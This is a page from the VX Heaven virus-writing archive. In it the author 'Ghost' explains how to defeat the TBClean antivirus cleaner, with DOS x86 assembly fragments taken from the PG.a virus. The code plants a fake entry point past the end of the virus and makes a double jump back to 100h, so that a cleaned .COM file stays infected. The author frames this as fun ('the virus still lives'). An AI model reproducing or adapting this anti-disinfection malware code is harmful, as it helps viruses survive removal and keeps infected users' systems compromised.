Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Anti-TBClean code

Ghost

[Back to index] [Comments]

Working around the generic cleaning ability of TBClean is easy to do. The following code fragments come from the PG.a virus. This code works with all versions of TBClean from 6.20 to 7.00 (that's all the versions I have :)

The first thing to realize is that TBClean works very generically. It assumes that a .COM infector will prepend a small jump construct, saving the orginal code, and then append the rest of the virus to the end of the victim file. It then expects the virus to clean the .COM file, and jump back to 100h, as though the .COM file had just started.

What we need to do to fool TBClean is 2 parts. First we must fool TBClean into thinking that the virus starts past where the virus actually is. Second, we need to JMP back to 100h TWICE. Once BEFORE we clean up the .COM header.

Step 1: The Virus Jump Header

Check a certain (your choice :) register for a value, and if this magic value is there, do a RET. This will be called from below just before we restore the .COM header. Next write a C3h to the first byte of the heap (1 byte past the last code/data of the virus). Then call this address. This will make TBClean think this is the entry point into the virus, but it's PAST the virus. TBClean will truncate the file when it cleans, but by doing this, that truncate is to the EXACT same size as it was when infected. Net result, the virus still lives :)

    model tiny
    .code

    org 100h

    start:
               ; Step 1 part 1
               cmp     ah, 30h     ; the check for the MAGIC number
               je      TBCleaning  ; yeah right (TBClean thinks so :)

               mov     ax, offset start_vir  ; This is the delta offset
                                             ; (it MUST be set when
                                             ; infecting a file, before
                                             ; the header is written to
                                             ; the file.)

               mov     bx, ax
               add     bx, vir_size
               mov     byte ptr[bx], 0C3h  ; one byte past the END of the
                                           ;virus :)

               ; TBCLEAN will clean to the address here (it's at the VERY
               ;last byte of the file image) It doen't matter if it is there
               ;or not! When TBClean is done cleaning this file, it is STILL
               ;infected!!

                ; Step 1 part 2
                call    bx

                jmp     start_vir           ; jump to the virus code
    TBCleaning:
                ret                         ; return back to the .COM fixing
                                            ; part.


    start_vir:  ; THE VIRUS STARTS HERE
                mov     bp, bx              ; put the delta offset into BP

Step 2: The .COM file restoration code

The final step is to trick TBClean into believing that the virus has ended, and that the .COM file is being started. Remember in step 1 where we checked for a MAGIC value in a register, well, we set up the register with that magic value here, and the do a CALL back to 100h. TBClean will think the virus has ended at this point, and will truncate the file (remember TBClean thinks the file should be trucated to the EXACT size that it is when infected :) After the code returns, then we fix up the .COM header, clear the registers, and JMP back to 100h and let the .COM file go on its way.

    start_com:
                ; Anti-TBClean code
                mov     ah, 30h         ; Setup  the MAGIC value in AH.
                mov     bx, 100h
                push    bx
                call    bx

    CopyCOMHeader:
                ; standard .COM re-starting code here.
                ...

                ret                     ; bx = 100h is still on stack.

Have fun. TBClean is such a fun product to mess with :)

By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua